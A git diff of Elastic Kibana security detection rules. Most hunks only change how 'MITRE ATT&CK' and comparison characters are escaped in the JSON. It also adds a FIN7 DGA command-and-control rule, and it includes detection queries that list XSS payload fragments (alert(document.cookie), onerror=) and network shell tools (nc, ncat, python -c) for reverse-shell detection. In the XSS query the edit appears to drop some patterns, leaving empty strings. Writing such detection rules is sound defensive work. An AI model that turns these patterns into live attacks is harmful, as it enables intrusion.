b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_104.json index ed3c73ea2c6..6aeecee6a1f 100644 --- a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_104.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_105.json index 41be27ae950..8092075797d 100644 --- a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_105.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Application Removed from Blocklist in Google Workspace", - "note": "## Triage and analysis\n\n### Investigating Application Removed from Blocklist in Google Workspace\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Individual users with the appropriate permissions can install applications in their Google Workspace domain. Administrators have additional permissions that allow them to install applications for an entire Google Workspace domain. Consent screens typically display permissions and privileges the user needs to install an application. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any Marketplace product that originates from a source that isn't Google.\n\nThis rule identifies a Marketplace blocklist update that consists of a Google Workspace account with administrative privileges manually removing a previously blocked application.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security \u003e Investigation` tool with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- After identifying the involved user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Application Removed from Blocklist in Google Workspace\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Individual users with the appropriate permissions can install applications in their Google Workspace domain. Administrators have additional permissions that allow them to install applications for an entire Google Workspace domain. Consent screens typically display permissions and privileges the user needs to install an application. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any Marketplace product that originates from a source that isn't Google.\n\nThis rule identifies a Marketplace blocklist update that consists of a Google Workspace account with administrative privileges manually removing a previously blocked application.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security > Investigation` tool with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- After identifying the involved user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.category:\"iam\" and event.type:\"change\" and\n event.action:\"CHANGE_APPLICATION_SETTING\" and\n google_workspace.admin.application.name:\"Google Workspace Marketplace\" and\n google_workspace.admin.old_value: *allowed*false* and google_workspace.admin.new_value: *allowed*true*\n", "references": [ "https://support.google.com/a/answer/6328701?hl=en#" @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_106.json index 259d53c346d..6bf966293db 100644 --- a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_106.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Application Removed from Blocklist in Google Workspace", - "note": "## Triage and analysis\n\n### Investigating Application Removed from Blocklist in Google Workspace\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Individual users with the appropriate permissions can install applications in their Google Workspace domain. Administrators have additional permissions that allow them to install applications for an entire Google Workspace domain. Consent screens typically display permissions and privileges the user needs to install an application. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any Marketplace product that originates from a source that isn't Google.\n\nThis rule identifies a Marketplace blocklist update that consists of a Google Workspace account with administrative privileges manually removing a previously blocked application.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security \u003e Investigation` tool with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- After identifying the involved user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Application Removed from Blocklist in Google Workspace\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Individual users with the appropriate permissions can install applications in their Google Workspace domain. Administrators have additional permissions that allow them to install applications for an entire Google Workspace domain. Consent screens typically display permissions and privileges the user needs to install an application. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any Marketplace product that originates from a source that isn't Google.\n\nThis rule identifies a Marketplace blocklist update that consists of a Google Workspace account with administrative privileges manually removing a previously blocked application.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security > Investigation` tool with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- After identifying the involved user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.category:\"iam\" and event.type:\"change\" and\n event.action:\"CHANGE_APPLICATION_SETTING\" and\n google_workspace.admin.application.name:\"Google Workspace Marketplace\" and\n google_workspace.admin.old_value: *allowed*false* and google_workspace.admin.new_value: *allowed*true*\n", "references": [ "https://support.google.com/a/answer/6328701?hl=en#" @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_1.json b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_1.json index 7ddec505f54..c598a68d5ee 100644 --- a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_1.json +++ b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_1.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_2.json b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_2.json index 9c4c864e4ec..30cca2334ad 100644 --- a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_2.json +++ b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_2.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_3.json b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_3.json index 09339d2a4cf..62027f5ce06 100644 --- a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_3.json +++ b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_3.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_101.json b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_101.json index a06a40b4879..077cc159bf0 100644 --- a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_101.json +++ b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_101.json @@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_102.json b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_102.json index ac8daf2c3d2..f2046b8b55e 100644 --- a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_102.json +++ b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_102.json @@ -31,7 +31,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_103.json b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_103.json index 10db24f5702..be94d9ef4ad 100644 --- a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_103.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_104.json b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_104.json index 4220b9f6f76..877b273d6f4 100644 --- a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_104.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_105.json b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_105.json new file mode 100644 index 00000000000..b7e9b54a415 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_105.json @@ -0,0 +1,69 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network.", + "false_positives": [ + "This rule could identify benign domains that are formatted similarly to FIN7's command and control algorithm. Alerts should be investigated by an analyst to assess the validity of the individual observations." + ], + "from": "now-9m", + "index": [ + "packetbeat-*", + "auditbeat-*", + "filebeat-*", + "logs-network_traffic.*" + ], + "language": "lucene", + "license": "Elastic License v2", + "name": "Possible FIN7 DGA Command and Control Behavior", + "note": "## Triage and analysis\n\nIn the event this rule identifies benign domains in your environment, the `destination.domain` field in the rule can be modified to include those domains. Example: `...AND NOT destination.domain:(zoom.us OR benign.domain1 OR benign.domain2)`.", + "query": "(event.dataset: (network_traffic.tls OR network_traffic.http) OR\n (event.category: (network OR network_traffic) AND type: (tls OR http) AND network.transport: tcp)) AND\ndestination.domain:/[a-zA-Z]{4,5}\\.(pw|us|club|info|site|top)/ AND NOT destination.domain:zoom.us\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ], + "related_integrations": [], + "risk_score": 73, + "rule_id": "4a4e23cf-78a2-449c-bac3-701924c269d3", + "severity": "high", + "tags": [ + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Domain: Endpoint" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + }, + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "4a4e23cf-78a2-449c-bac3-701924c269d3_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_1.json b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_1.json index 4f4ed2a6f20..3a53779d99d 100644 --- a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_1.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_2.json b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_2.json index b9356ced2e4..c9887d18ce2 100644 --- a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_2.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_3.json b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_3.json index f3827b2de18..f1ca05f7430 100644 --- a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_3.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_4.json b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_4.json index 2dc3970c156..6a2dcc25510 100644 --- a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_4.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4aa58ac6-4dc0-4d18-b713-f58bf8bd015c_1.json b/packages/security_detection_engine/kibana/security_rule/4aa58ac6-4dc0-4d18-b713-f58bf8bd015c_1.json index 2366d025af7..becb8e7ebec 100644 --- a/packages/security_detection_engine/kibana/security_rule/4aa58ac6-4dc0-4d18-b713-f58bf8bd015c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/4aa58ac6-4dc0-4d18-b713-f58bf8bd015c_1.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Cross Site Scripting (XSS)", - "query": "any where processor.name == \"transaction\" and\nurl.fragment : (\"\u003ciframe*\", \"*prompt(*)*\", \"\u003cscript*\u003e\", \"\u003csvg*\u003e\", \"*onerror=*\", \"*javascript*alert*\", \"*eval*(*)*\", \"*onclick=*\",\n\"*alert(document.cookie)*\", \"*alert(document.domain)*\",\"*onresize=*\",\"*onload=*\",\"*onmouseover=*\")\n", + "query": "any where processor.name == \"transaction\" and\nurl.fragment : (\"\", \"\", \"*onerror=*\", \"*javascript*alert*\", \"*eval*(*)*\", \"*onclick=*\",\n\"*alert(document.cookie)*\", \"*alert(document.domain)*\",\"*onresize=*\",\"*onload=*\",\"*onmouseover=*\")\n", "references": [ "https://github.com/payloadbox/xss-payload-list" ], @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_1.json b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_1.json index 9b687688335..ae1482a0c40 100644 --- a/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_1.json +++ b/packages/security_detection_engine/kibana/security_rule/4b1a807a-4e7b-414e-8cea-24bf580f6fc5_1.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Parent Process", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"fork\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n", "references": [ 